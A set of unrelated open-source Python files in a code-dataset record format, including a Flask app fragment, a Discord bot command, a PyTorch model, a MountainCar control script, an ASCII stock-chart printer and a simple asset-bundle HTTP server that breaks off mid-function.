df_new.groupby(['apdt'])['pt'].count()\r\n df_op = df_op.reset_index()\r\n df_op = df_op.rename(columns={\"apdt\": \"date\"})\r\n\r\n\t#Convert to Dictionary\r\n df_dict = df_op.to_dict('records')\r\n \r\n dlist = []\r\n for i in range(len(df_dict)):\r\n df_newdict = {\r\n \"date\": df_dict[i]['date'],\r\n \"event\": [\r\n {\r\n \"color\": \"violet\", \r\n \"name\": \"Appointments\", \r\n \"value\": df_dict[i]['Total']\r\n }, \r\n #{\r\n #\"color\": \"green\", \r\n #\"name\": \"Confirmed\", \r\n #\"value\": df_dict[i]['Cnf']\r\n #}, \r\n {\r\n \"color\": \"red\", \r\n \"name\": \"Low Probability\", \r\n \"value\": df_dict[i]['Lo']\r\n }, \r\n {\r\n \"color\": \"amber\", \r\n \"name\": \"High Probability\", \r\n \"value\": df_dict[i]['High']\r\n }]\r\n }\r\n dlist.append(df_newdict.copy())\r\n\r\n return(jsonify(dlist))\r\n \r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n","repo_name":"SGRGit/noshowprediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2218824659","text":"\"\"\"$to get\"\"\"\nimport discord\n\nfrom offthedialbot import utils\n\n\nclass ToGet(utils.Command):\n\n @classmethod\n @utils.deco.require_role(\"Staff\")\n async def main(cls, ctx, user: discord.User):\n \"\"\"Retrieve the profile and signup of a user.\"\"\"\n user = utils.User(user.id)\n await cls.send_user_embed(ctx, user)\n await cls.send_signup_embed(ctx, user)\n\n @classmethod\n async def send_user_embed(cls, ctx, user: utils.User):\n if not user.doc.exists:\n await utils.Alert(ctx, utils.Alert.Style.DANGER, title=\"User doesn't have an account!\")\n try:\n d = user.discord(ctx.bot)\n if d:\n name, mention = d.name, d.mention\n else:\n name, mention = user.id, \"N/A\"\n\n embed = discord.Embed(\n title=name,\n description=\"\\n\".join([\n f\"`User Mention: ` **{mention}**\",\n f\"`SplashTag: ` **`{user.dict['profile']['splashtag']}`**\",\n f\"`SW: ` **`{user.dict['profile']['sw']}`**\",\n f\"`Rank: ` **`{user.get_rank()}`**\",\n f\"`Weapons: ` \\n> {user.get_weapons()}\",\n f\"`Competitive Exp:` \\n> {user.dict['profile']['cxp']}\",\n f\"`Smash.gg Info: ` **`{(await user.smashgg())['player']['gamerTag']}`** **(`{user.dict['profile']['slug']}`)**\",\n f\"`Signal Strength:` **`{user.dict['meta']['signal']}`**\",\n ]))\n await utils.CommandUI.create_ui(ctx, embed)\n except KeyError:\n await utils.CommandUI.create_ui(ctx, discord.Embed(\n title=name,\n description=f\"```\\n{user.dict}\\n```\"))\n\n @classmethod\n async def send_signup_embed(cls, ctx, user: utils.User):\n signup = user.signup(ignore_ended=True)\n if not signup:\n return\n embed = discord.Embed(\n color=utils.colors.COMPETING,\n title=signup.col.capitalize(),\n description=\"\\n\".join([\n f\"`Signup Date: ` **`{signup.dict['signupDate']}`**\",\n f\"`Modified Date:` **`{signup.dict['modifiedDate']}`**\",\n f\"`Timezone: ` **`{signup.dict['timezone']}`**\",\n ]))\n await utils.CommandUI.create_ui(ctx, embed)\n","repo_name":"offthedial/bot","sub_path":"offthedialbot/commands/to/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"38629518889","text":"from enum import Enum\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.utils.rnn as tnur\nfrom typing import List, Tuple, Type\nfrom . import seq\n\n\nclass StrideOn(Enum):\n First = 0\n Last = 1\n All = 2\n\n\ndef _depth_cat(h: torch.Tensor, depth: int) -> torch.Tensor:\n dshape = (h.shape[0], 1, h.shape[2])\n d = torch.full(dshape, math.log1p(depth), device=h.device)\n return torch.cat([h, d], dim=1)\n\n\nclass Block(nn.Module):\n def __init__(\n self,\n seq_conv_cls: Type[seq.ConvBase],\n channels: int, kernel_size: int, stride: int, pad_delta: int,\n leak: float = 0.0, layer_norm: bool = True, depth_variant: bool = True\n ) -> None:\n super().__init__()\n self.channels = channels\n self.kernel_size = kernel_size\n self.stride = stride\n self.pad_delta = pad_delta\n self.leak = leak\n self.layer_norm = layer_norm\n self.depth_variant = depth_variant\n self.conv1 = seq_conv_cls(\n in_channels=channels + (1 if depth_variant else 0),\n out_channels=channels * 2,\n kernel_size=kernel_size,\n stride=stride,\n pad_delta=pad_delta)\n self.norm1 = seq.LayerNorm() if layer_norm else None\n self.conv2 = seq_conv_cls(\n in_channels=channels + (1 if depth_variant else 0),\n out_channels=channels,\n kernel_size=kernel_size,\n stride=1,\n pad_delta=1)\n self.norm2 = seq.LayerNorm() if layer_norm else None\n self.act = nn.LeakyReLU(leak) if leak > 0 else nn.ReLU()\n\n def forward(self, h: torch.Tensor, N: torch.Tensor, depth: int) -> Tuple[torch.Tensor, torch.Tensor]:\n c = self.channels\n if self.depth_variant:\n h = _depth_cat(h, depth)\n lr, N = self.conv1(h, N)\n l = lr[:, :c]\n r = lr[:, c:]\n if self.norm1 is not None:\n r = self.norm1(r, N)\n r = self.act(r)\n if self.depth_variant:\n r = _depth_cat(r, depth)\n r, _ = self.conv2(r, N)\n if self.norm2 is not None:\n r = self.norm2(r, N)\n return l + self.act(r), N\n\n\ndef _stride(layer: int, n_layers: int, stride_on: StrideOn) -> bool:\n if stride_on == StrideOn.All:\n return True\n elif stride_on == StrideOn.First:\n return layer == 0\n elif stride_on == StrideOn.Last:\n return layer == (n_layers - 1)\n else:\n raise ValueError(f'bad stride_on: {stride_on}')\n\n\nclass Reduce(nn.Module):\n def __init__(\n self,\n hidden: int, kernel_size: int, stride: int, layers: int, depth_variant: bool,\n stride_on: StrideOn, leak: float, dropout: float, layer_norm: bool\n ) -> None:\n super().__init__()\n self.hidden = hidden\n self.kernel_size = kernel_size\n self.stride = stride\n self.layers = layers\n self.depth_variant = depth_variant\n self.stride_on = stride_on\n self.leak = leak\n self.dropout = dropout\n self.layer_norm = layer_norm\n self.blocks = nn.ModuleList([\n Block(\n seq_conv_cls=seq.Conv,\n channels=hidden,\n kernel_size=kernel_size,\n stride=stride if _stride(l, layers, stride_on) else 1,\n pad_delta=1,\n leak=leak,\n depth_variant=depth_variant,\n layer_norm=layer_norm)\n for l in range(layers)])\n\n def forward(self, h: torch.Tensor, N: torch.Tensor) -> torch.Tensor:\n if self.training and self.dropout > 0.0:\n mask_shape = (h.shape[0], h.shape[1], 1)\n mask = torch.rand(mask_shape, device=h.device) > self.dropout\n mask = mask / (1 - self.dropout)\n else:\n mask = None\n out = []\n depth = 0\n while h.shape[0] > 0:\n if mask is not None:\n h = mask * h\n for block in self.blocks:\n h, N = block(h, N, depth)\n reduced = (N <= 1)\n out.append(h[reduced, :, 0])\n h = h[~reduced]\n N = N[~reduced]\n if mask is not None:\n mask = mask[~reduced]\n depth += 1\n return torch.cat(out, dim=0)\n\n\nclass Classify(nn.Module):\n def __init__(\n self,\n features: int, classes: int,\n inproj_size: int, inproj_stride: int, inproj_norm: bool,\n hidden: int, kernel_size: int, stride: int, layers: int, depth_variant: bool, stride_on: StrideOn,\n outproj_size: int,\n dropout: float, leak: float, layer_norm: bool\n ) -> None:\n super().__init__()\n self.inproj_conv = seq.Conv(\n in_channels=features,\n out_channels=hidden,\n kernel_size=inproj_size,\n stride=inproj_stride,\n pad_delta=1,\n bias=not inproj_norm)\n self.inproj_norm = seq.BatchNorm(hidden) if inproj_norm else None\n self.inproj_act = nn.LeakyReLU(leak) if leak > 0.0 else nn.ReLU()\n self.reduce = Reduce(\n hidden=hidden,\n kernel_size=kernel_size,\n stride=stride,\n layers=layers,\n depth_variant=depth_variant,\n stride_on=stride_on,\n dropout=dropout,\n leak=leak,\n layer_norm=layer_norm)\n self.outproj_lin1 = nn.Linear(\n in_features=hidden,\n out_features=outproj_size)\n self.outproj_act = nn.LeakyReLU(leak) if leak > 0.0 else nn.ReLU()\n self.outproj_lin2 = nn.Linear(\n in_features=outproj_size,\n out_features=classes)\n\n def forward(self, xs: List[torch.Tensor]) -> torch.Tensor:\n N = torch.tensor([x.shape[0] for x in xs], device=xs[0].device, dtype=torch.int)\n x = tnur.pad_sequence(xs, batch_first=True).transpose(1, 2)\n N, sorted_indices = torch.sort(N)\n x = x[sorted_indices]\n h, N = self.inproj_conv(x, N)\n if self.inproj_norm is not None:\n h = self.inproj_norm(h, N)\n h = self.inproj_act(h)\n h = self.reduce(h, N)\n h = self.outproj_lin1(h)\n h = self.outproj_act(h)\n z = self.outproj_lin2(h)\n return z[seq.invert_permutation(sorted_indices)]\n","repo_name":"dschulman/pslicn","sub_path":"pslicn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"12318308692","text":"# Kirjoita ohjelma, joka kysyy käyttäjältä lukuja siihen saakka,\n# kunnes tämä syöttää tyhjän merkkijonon lopetusmerkiksi.\n# Lopuksi ohjelma tulostaa saaduista luvuista pienimmän ja suurimman.\n\nUI = input(\"Anna luku. Ohjelma loppuu, kun annat tyhjän merkkijonon: \")\nlowest_num = 0\nhighest_num = 0\nindex = 0\n\nwhile UI != \"\":\n\n number = int(UI)\n if lowest_num == 0:\n if index == 0:\n lowest_num = number\n\n if highest_num == 0:\n highest_num = number\n\n if number < lowest_num:\n lowest_num = number\n\n if number > highest_num:\n highest_num = number\n\n index += 1\n\n UI = input('Anna luku. Ohjelma loppuu, kun annat tyhjän merkkijonon: ')\n\nprint('Pienin syötetty luku: ' + str(lowest_num))\nprint('Suurin syötetty luku: ' + str(highest_num))","repo_name":"naigelt/Python-Homework","sub_path":"Moduuli 4 Tehtävät/Teht_4.3.py","file_name":"Teht_4.3.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"37191162434","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\n\nfrom SocketClient import SocketClient\nimport threading\n\n#UI파일 연결\n#단, UI파일은 Python 코드 파일과 같은 디렉토리에 위치해야한다.\nform_class = uic.loadUiType(\"client.ui\")[0]\n\n#화면을 띄우는데 사용되는 Class 선언\nclass WindowClass(QMainWindow, form_class) :\n def __init__(self) :\n super().__init__()\n self.setupUi(self) \n\n self.clientSocket = SocketClient() #Socket client 객체 생성\n\n self.sendBtn.clicked.connect(self.SendBtnEvent) # send button에 대한 event 등록\n self.connectBtn.clicked.connect(self.ConnectBtnEvent) # connect button에 대한 event 등록\n self.disconnectBtn.clicked.connect(self.DisconnectBtnEvent) # disconnect button에 대한 event 등록\n self.menuexit.triggered.connect(self.AppExit) # 상단 menu bar의 exit에 대한 event 등록\n\n self.clientSocket.RegRxCallbackFunc(self.RxMessageProcess) # 메시지 수신시 호출할 함수를 등록\n\n #상단 menu bar의 exit에 대한 구현 부\n def AppExit(self) :\n self.clientSocket.SocketClose()\n self.close()\n\n #Send 버튼에 대한 구현 부\n def SendBtnEvent(self) :\n print(\"send\")\n #self.view.append(self.inputTxt.toPlainText())\n self.clientSocket.SocketSend(self.inputTxt.toPlainText())\n self.inputTxt.clear()\n \n #Connect 버튼에 대한 구현 부\n def ConnectBtnEvent(self) :\n print(\"connect\")\n \n addr = self.inputServerAddr.toPlainText()\n port = int(self.inputPort.toPlainText())\n if (len(addr) > 0) and (port > 0) : \n print(\"Try to connect to [addr : {}] [port : {}]\".format(addr, port))\n self.clientSocket.SocketOpen(addr, port)\n else :\n print(\"Check server address and port\")\n \n #disconnect 버튼에 대한 구현 부\n def DisconnectBtnEvent(self) :\n print(\"disconnect\")\n self.clientSocket.SocketClose()\n\n #메시지 수신시 화면 출력\n def RxMessageProcess(self, data) :\n print('Rx Message : {}'.format(data))\n self.view.append(data)\n \nif __name__ == \"__main__\" :\n #QApplication : 프로그램을 실행시켜주는 클래스\n app = QApplication(sys.argv) \n\n #WindowClass의 인스턴스 생성\n myWindow = WindowClass() \n\n #프로그램 화면을 보여주는 코드\n myWindow.show()\n \n #프로그램을 이벤트루프로 진입시키는(프로그램을 작동시키는) 코드\n app.exec_() ","repo_name":"curious1123/SimpleMessager","sub_path":"SocketClient/StartClient.py","file_name":"StartClient.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"34818399512","text":"from utils import load_checkpoint\nimport numpy as np\nimport gym\nimport custom_gym\n\nfrom gym import wrappers\nimport torch\nfrom pynput import keyboard\nfrom time import sleep\n\n\nclass Listener:\n\n def __init__(self, a):\n self.action = a\n self.lis = keyboard.Listener(on_press=self.on_press)\n self.lis.start()\n # self.lis.join()\n\n def on_press(self, key):\n try:\n k = key.char # single-char keys\n except:\n k = key.name # other keys\n if key == keyboard.Key.esc: return False # stop listener\n\n if k == 'left':\n # Push left\n print('Key pressed: ' + k)\n self.action *= 0\n self.action[0] = 1\n # print(self.action)\n if k == 'down':\n # no push\n print('Key pressed: ' + k)\n self.action *= 0\n self.action[1] = 1\n # print(self.action)\n if k == 'right':\n # push right\n print('Key pressed: ' + k)\n self.action *= 0\n self.action[2] = 1\n # print(self.action)\n\n\nrng = np.random.RandomState(23456)\nsave_path = './models/mountaincar_3D'\n\naction_sequence = np.load('./action_sequence2.npz')['arr_0']\n# action_sequence = np.reshape(action_sequence,(1001,3))\n\natt, cluster = load_checkpoint(save_path, 8)\n\nmin_position = -1.2\nmax_position = 0.6\nmax_speed = 0.07\n\natt = att.cpu()\nfor c in range(len(cluster)):\n cluster[c].cpu()\n\n\nenv = gym.make('mcEnv-v0')\n# env = gym.wrappers.Monitor(env, './video', force=True)\nstart_obs = env.reset()\n\nstart_action = np.zeros(3)\nstart_action[env.action_space.sample()] = 1\naction = np.zeros(3)\naction[1] = 1\n\nactions = []\n\n# for i in action_sequence:\n# actions += [np.argmax(i)]\n# action = action_sequence[0]\n\nlistener = Listener(action)\n\nX = torch.tensor([np.append(start_obs, start_action)], dtype=torch.float)\nX[:, 0] = (X[:, 0] - min_position) / (max_position - min_position)\nX[:, 1] = (X[:, 1] + max_speed) / (max_speed + max_speed)\n\n\nY_pred_all = cluster.forward(X)\nattention = att.forward(X)\n\nY_pred_att_argmax = Y_pred_all[torch.argmax(attention)]\nY_pred_att_argmax = Y_pred_att_argmax.detach().numpy().flatten()\n\n# denormalization\nY_pred_att_argmax[0] = (Y_pred_att_argmax[0]) * (max_position - min_position) + min_position\nY_pred_att_argmax[1] = (Y_pred_att_argmax[1]) * (max_speed + max_speed) - max_speed\n# clipping\nY_pred_att_argmax[0] = np.clip(Y_pred_att_argmax[0], min_position, max_position)\nY_pred_att_argmax[1] = np.clip(Y_pred_att_argmax[1], -max_speed, max_speed)\naction_list = action\nobs_real, _, _, _ = env.step(np.argmax(start_action))\nrecorded_actions = np.empty((0, 3))\n\nfor i in range(4001):\n\n \"\"\" Comment this to use hotkeys for controlling the car\"\"\"\n\n action = action_sequence[i]\n # AUTOREGRESSIVE\n X = torch.tensor([np.append(Y_pred_att_argmax, action)], dtype=torch.float)\n # normalization\n X[:, 0] = (X[:, 0] - min_position) / (max_position - min_position)\n X[:, 1] = (X[:, 1] + max_speed) / (max_speed + max_speed)\n Y_pred_all = cluster.forward(X)\n\n attention = att.forward(X)\n # print(torch.argmax(attention))\n Y_pred_att_argmax = Y_pred_all[torch.argmax(attention)]\n Y_pred_att_argmax = Y_pred_att_argmax.detach().numpy().flatten()\n Y_pred_att_argmax[0] = Y_pred_att_argmax[0] * (max_position - min_position) + min_position\n Y_pred_att_argmax[1] = Y_pred_att_argmax[1] * (max_speed + max_speed) - max_speed\n\n Y_pred_att_argmax[0] = np.clip(Y_pred_att_argmax[0], min_position, max_position)\n Y_pred_att_argmax[1] = np.clip(Y_pred_att_argmax[1], -max_speed, max_speed)\n\n # env.set_state(Y_pred_att_argmax)\n env.step(np.argmax(action))\n\n env.render()\n # recorded_actions = np.append(recorded_actions, [action], axis=0)\n\n\n# np.savez('action_sequence2.npz', recorded_actions)\nenv.close()\n","repo_name":"NicoBach/distributed-dynamics-model","sub_path":"run_mountaincar.py","file_name":"run_mountaincar.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"17823651938","text":"# -*- coding: utf-8 -*-\n\n\n#from copy import deepcopy\nfrom datetime import(\n datetime\n)\nimport math\n\n# config\nmin_chart_width = 10\nmin_chart_height = 10\nchart_width = 50\nchart_height = 20\nchart_bg = '.'\nlabel_bg = '░' #█\ncandle_default = '░' # '─'\ncandle_bg = '|'\ncandle_open = '┤'\ncandle_high = '|'\ncandle_low = '|'\ncandle_close = '├'\ncandle_open_close = '┼'\nborder_top = '-'\nborder_sides = '|'\ndraw_border = False\n\n\ndef show(ts_unsorted):\n \"\"\"\n time series (ts) formats\n 1-datum [ [dt, int], ]\n OHLC [ [dt, [int, int, int, int] ]\n 1. sort time series by date\n 2. determine date span per ascii column (end-start)/(num cols)\n 3. for each col, avg points in that span --> this is price for that col\n NOTE: \n for open, do first\n for high, do max\n for low, do min \n for close, do last\n for mid, do avg\n determine y range from column data, not source points\n if no data in a span --> copy left col\n \"\"\"\n # validation\n if len(ts_unsorted) < 1:\n print('empty time series')\n #elif len(ts_unsorted) < chart_width:\n # print('insufficient ticks ({}) for chart width of ({})'.format(len(ts_unsorted), chart_width))\n # determine format of time series\n elif len( ts_unsorted[0][1] ) == 1:\n print ('SINGLE')\n show_single(ts_unsorted)\n elif len( ts_unsorted[0][1] ) == 4:\n print ('OHLC')\n show_ohlc(ts_unsorted)\n else:\n print ('UNKNOWN')\n\n \ndef show_single(ts_unsorted):\n # sort\n ts = sorted(ts_unsorted, key=lambda p: p[0])\n # range\n start = None\n end = None\n y_min = None\n y_max = None\n for p in ts:\n if start is None or p[0] < start: start = p[0]\n if end is None or p[0] > end: end = p[0]\n if y_min is None or p[1][0] < y_min: y_min = p[1][0]\n if y_max is None or p[1][0] > y_max: y_max = p[1][0]\n # validation\n assert start==ts[0][0], end==ts[len(ts)-1][0]\n # plot\n col_i = 0 # current ascii chart column index\n col_span = (end-start)/chart_width\n chart = []\n avg = float(0)\n num_vals_in_avg = 0\n for point in ts:\n avg += point[1][0]\n num_vals_in_avg += 1\n # compare cur date to next threshold\n if point[0] > ts[0][0] + ((col_i+1) * col_span):\n # filled one ascii col; append to chart\n avg /= num_vals_in_avg\n candle = [chart_bg]*chart_height \n if avg == y_min:\n row_i = int(0); \n elif avg == y_max:\n row_i = int(chart_height - 1)\n else:\n row_i = float( (avg - y_min) / (y_max - y_min) ) # percent: 0 to 100\n row_i *= chart_height # scale: 0 to chart_height\n row_i = int(row_i)\n candle[row_i] = candle_default\n chart.append(candle)\n avg = point[1][0]\n num_vals_in_avg = 1\n col_i += 1\n #print\n for y in range(len(chart[0])-1, -1, -1):\n for x in range(0, len(chart)):\n print(chart[x][y], end='')\n print()\n print()\n return\n\n # y axis labels - one candle at the left\n y_labels = [label_bg]*chart_height\n y_labels[0] = str(max_price) + label_bg\n y_labels[chart_height-1] = str(min_price) + label_bg\n y_labels_width = max( len(y_labels[0]), len(y_labels[chart_height-1]) )\n y_labels_width = min(y_labels_width, 10) # hard-coded max\n for z in range(0, chart_height): # justify labels\n y_labels[z] = y_labels[z].ljust(y_labels_width)\n y_labels[z] = y_labels[z][:y_labels_width-1] # trim\n y_labels[z] += label_bg\n chart = [y_labels] + chart # append to left of chart\n\n # print main chart\n for y in range(0, len(chart[0])):\n for x in range(0, len(chart)):\n print(chart[x][y], end='')\n print()\n # x axis labels - make one row for each label,\n x_labels = []\n\n total_width = y_labels_width + len(chart)\n\n row = [label_bg]*y_labels_width + list(str(start))\n while len(row) < total_width - 1: row += label_bg\n x_labels.append(row[:total_width-1])\n\n row = str(end).rjust( total_width-1 )\n x_labels.append( row )\n\n for row in range(0, len(x_labels)):\n for col in range(0, len(x_labels[0])):\n print( x_labels[row][col], end='')\n print()\n \"\"\"\n y axis = min price to max\n x axis = first time to last\n divide prices into chunks\n average price of each chunk\n list of candles (horizontal)\n from each candle, make a vertical list of chars\n for each row of candle:\n for each candle:\n print one char\n line break carriage return\n \"\"\"\n\n\n\ndef show_ohlc(ts_unsorted):\n \"\"\"\n OHLC [ [dt, [int, int, int, int] ]\n \"\"\"\n # sort\n ts = sorted(ts_unsorted, key=lambda p: p[0])\n # spans\n start = ts[0][0]\n end = ts[len(ts)-1][0]\n y_max = ts[0][1][1] # initialize to first high\n y_min = ts[0][1][2] # initialize to first low\n for p in ts:\n y_max = max( p[1][1], y_max ) # max high\n y_min = min( p[1][2], y_min ) # min low\n # plot\n col_i = 0 # current ascii chart column index\n col_span = (end-start)/chart_width\n chart = []\n first_open = None\n highest = None\n lowest = None\n for tick in ts:\n if not first_open: first_open = tick[1][0]\n if highest: highest = max(highest, tick[1][1])\n else: highest = tick[1][1]\n if lowest: lowest = min(lowest, tick[1][2])\n else: lowest = tick[1][2]\n final_close = tick[1][3] # final within candle\n # compare cur date to next threshold\n if tick[0] > ts[0][0] + ((col_i+1) * col_span):\n\n # calculate row index for each of OHLC:\n # open\n if first_open: \n if first_open == y_min: open_i = int(0); \n elif first_open == y_max: open_i = int(chart_height - 1)\n else:\n open_i = float( (first_open - y_min) / (y_max - y_min) ) # percent: 0 to 100\n open_i *= chart_height # scale: 0 to chart_height\n open_i = int(open_i) # floor\n # high\n if highest == y_min: high_i = int(0)\n elif highest == y_max: high_i = int(chart_height - 1)\n else:\n high_i = float( (highest - y_min) / (y_max - y_min) ) # percent: 0 to 100\n high_i *= chart_height # scale: 0 to chart_height\n high_i = int(high_i) # floor\n # low\n if lowest == y_min: low_i = int(0)\n elif lowest == y_max: low_i = int(chart_height - 1)\n else:\n low_i = float( (lowest - y_min) / (y_max - y_min) ) # percent: 0 to 100\n low_i *= chart_height # scale: 0 to chart_height\n low_i = int(low_i) # floor\n # close\n if final_close == y_min: close_i = int(0); \n elif final_close == y_max: close_i = int(chart_height - 1)\n else:\n close_i = float( (final_close - y_min) / (y_max - y_min) ) # percent: 0 to 100\n close_i *= chart_height # scale: 0 to chart_height\n close_i = int(close_i) # floor\n # draw candle\n candle = [chart_bg]*chart_height \n for row_i in range(low_i, high_i+1):\n candle[row_i] = candle_bg\n candle[high_i] = candle_high\n candle[low_i] = candle_low\n if open_i == close_i:\n candle[open_i] = candle_open_close\n else:\n candle[open_i] = candle_open\n candle[close_i] = candle_close\n # add to chart\n chart.append(candle)\n # increment + continue\n col_i += 1\n first_open = False\n highest = None\n lowest = None\n\n # y axis labels - one candle at the left\n y_labels = [label_bg]*chart_height\n y_labels[0] = str(y_min) + label_bg\n y_labels[chart_height-1] = str(y_max) + label_bg\n y_labels_width = max( len(y_labels[0]), len(y_labels[chart_height-1]) ) # get widest label\n y_labels_width = min(y_labels_width, 10) # width threshold\n for z in range(0, chart_height): # justify labels\n y_labels[z] = y_labels[z].ljust(y_labels_width, label_bg)\n y_labels[z] = y_labels[z][:y_labels_width-1] # trim\n y_labels[z] += label_bg\n chart = [y_labels] + chart # append to left of chart\n\n # print main chart\n for y in range( len(chart[0])-1, -1, -1 ):\n for x in range(0, len(chart)):\n print(chart[x][y], end='')\n print()\n\n # x axis labels - make one row for each label,\n x_labels = []\n\n total_width = y_labels_width + len(chart)\n # starting timestamp\n row = [label_bg]*y_labels_width + list(str(start))\n while len(row) < total_width - 1: row += label_bg\n x_labels.append(row[:total_width-1])\n # ending timestamp\n row = str(end).rjust( total_width-1, label_bg )\n x_labels.append( row )\n\n for row in range(0, len(x_labels)):\n for col in range(0, len(x_labels[0])):\n print( x_labels[row][col], end='')\n print()\n \"\"\"\n y axis = min price to max\n x axis = first time to last\n divide prices into chunks\n average price of each chunk\n list of candles (horizontal)\n from each candle, make a vertical list of chars\n for each row of candle:\n for each candle:\n print one char\n line break carriage return\n \"\"\"\n","repo_name":"paperduck/cli_chart","sub_path":"cli_chart.py","file_name":"cli_chart.py","file_ext":"py","file_size_in_byte":9884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"29029799199","text":"#!/usr/bin/python3\n\nimport string,cgi,time\nimport argparse\nimport json\nimport inspect\nimport base64\nimport datetime\nimport calendar\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom os import curdir, sep, listdir\nfrom os.path import isfile, join, dirname\nimport os\n\nASSET_BUNDLE_FOLDER = \"Assets/AssetBundles\"\nTHUMBNAIL_FOLDER\t= \"Assets/Thumbnails\"\nSCENE_FOLDER\t\t= \"Assets/SceneSaves\"\nSCENE_SAVE_EXT\t\t= \"scsav\"\n\nSERVER_ADDR\t\t\t= \"\"\n\ndef GetAssetListing():\n\tassetBundles = [f for f in listdir(ASSET_BUNDLE_FOLDER) if isfile(join(ASSET_BUNDLE_FOLDER, f))]\n\toutput = []\n\n\tfor bundle in assetBundles:\n\t\tif bundle.startswith(\"AssetBundles\"):\n\t\t\tcontinue\n\n\t\tif not bundle.endswith(\".manifest\") and not bundle.endswith(\".meta\"):\n\t\t\t# Check if a Thumbnail exists\n\t\t\tthumbURI = THUMBNAIL_FOLDER + \"/\" + bundle + \".png\"\n\n\t\t\titem = {\"BundleName\": bundle}\n\n\t\t\tif os.path.isfile(thumbURI):\n\t\t\t\twith open(thumbURI, \"rb\") as thumb:\n\t\t\t\t\titem[\"Thumbnail\"] = base64.b64encode(thumb.read()).decode(\"ascii\")\n\n\t\t\toutput.append(item)\n\n\t\t\t'''\n\t\t\t# Find out which assets are contained in the current bundle\n\t\t\tassets = []\n\t\t\twith open(ASSET_BUNDLE_FOLDER+\"/\"+bundle+\".manifest\", encoding=\"utf-8\") as manifest:\n\t\t\t\tassetListReached = False\n\t\t\t\tfor line in manifest:\n\t\t\t\t\tif line.startswith(\"Assets:\"):\n\t\t\t\t\t\tassetListReached = True\n\t\t\t\t\telif assetListReached:\n\t\t\t\t\t\tif line.startswith(\"- \"):\n\t\t\t\t\t\t\tassets.append(line[2:].strip())\n\t\t\toutput.append({\"BundleName\": bundle, \"Assets\": assets})\n\t\t\t'''\n\t\t\t\n\treturn output\n\ndef GetSceneListing():\n\tscenes = [f for f in listdir(SCENE_FOLDER) if isfile(join(SCENE_FOLDER, f))]\n\toutput = []\n\n\tfor scene in scenes:\n\n\t\tif not scene.endswith(\".manifest\") and not scene.endswith(\".meta\"):\n\t\t\toutput.append({\"LastModified\": os.path.getmtime(SCENE_FOLDER + \"/\" + scene), \"Name\": scene[:-6]})\n\n\treturn output\n\nclass MyHandler(BaseHTTPRequestHandler):\n\n\tdef do_GET(self):\n\t\tpaths = self.path[1:].split('/')\n\t\tGET_ROOT = paths[0]\n\n\t\tif self.path == \"/\":\n\t\t\tmethods = inspect.getmembers(self, predicate=inspect.ismethod)\n\t\t\tpossibleMethods = {}\n\n\t\t\t# Get all HTTP-METHODs in this class (e.g. GET, PUT, DELETE etc.)\n\t\t\tfor meth in methods:\n\t\t\t\tif meth[0].startswith(\"do_\"):\n\t\t\t\t\thttpMethod = meth[0][3:]\n\t\t\t\t\tpossibleMethods[httpMethod] = []\n\t\t\t\t\t# Now cycle through all the methods again and see if we have servlets\n\t\t\t\t\tfor servlet in methods:\n\t\t\t\t\t\tif servlet[0].startswith(httpMethod.lower() + \"_\"):\n\t\t\t\t\t\t\tpossibleMethods[httpMethod].append(servlet[0][servlet[0].index(\"_\")+1:])\n\n\t\t\tself.send_response(200)\n\t\t\tself.send_header('Content-type', 'application/json')\n\t\t\tself.end_headers()\n\t\t\tself.wfile.write(json.dumps({\"Server-Methods\": possibleMethods}).encode(\"utf-8\"))\n\t\t\tself.wfile.flush()\n\n\t\telse:\n\t\t\trequest = \"get_\" + GET_ROOT\n\t\t\tif hasattr(self, request):\n\t\t\t\tmethod = getattr(self, request)\n\t\t\t\tif inspect.ismethod(method):\n\t\t\t\t\tmethod(\"\".join(paths[1:]))\n\t\t\telse:\n\t\t\t\tself.send_error(501,\"%s-Module not implemented\" % GET_ROOT)\n\t\treturn\n\n\tdef do_PUT(self):\n\t\tpaths = self.path\n\t\tpaths = self.path[1:].split('/')\n\t\tPUT_ROOT = paths[0]\n\n\t\tif self.path.endswith('/'):\n\t\t\tself.send_response(405, \"Method Not Allowed\")\n\t\t\tself.end_headers()\n\t\t\tself.wfile.write(\"PUT not allowed on a directory\\n\".encode())\n\t\t\tself.wfile.flush()\n\t\telif PUT_ROOT == \"\":\n\t\t\tself.send_response(405, \"Method Not Allowed\")\n\t\t\tself.end_headers()\n\t\t\tself.wfile.write(\"PUT not allowed on directory root\\n\".encode())\n\t\t\tself.wfile.flush()\n\t\telse:\n\t\t\trequest = \"put_\" + PUT_ROOT\n\t\t\tif hasattr(self, request):\n\t\t\t\tmethod = getattr(self, request)\n\t\t\t\tif inspect.ismethod(method):\n\t\t\t\t\tmethod(\"\".join(paths[1:]))\n\t\t\telse:\n\t\t\t\tself.send_error(501,\"%s-Module not implemented\" % GET_ROOT)\n\n\tdef get_Bundle(self, path):\n\t\tif path == \"\":\n\t\t\tself.send_response(200)\n\t\t\tself.send_header('Content-type', 'application/json')\n\t\t\tself.end_headers()\n\t\t\tself.wfile.write(json.dumps({\"AssetBundleList\": GetAssetListing()}).encode(\"utf-8\"))\n\t\t\tself.wfile.flush()\n\t\telse:\n\t\t\ttry:\n\t\t\t\tf = open(ASSET_BUNDLE_FOLDER + \"/\" + path, 'rb')\n\n\t\t\t\tself.send_response(200)\n\t\t\t\tself.send_header('Content-type', 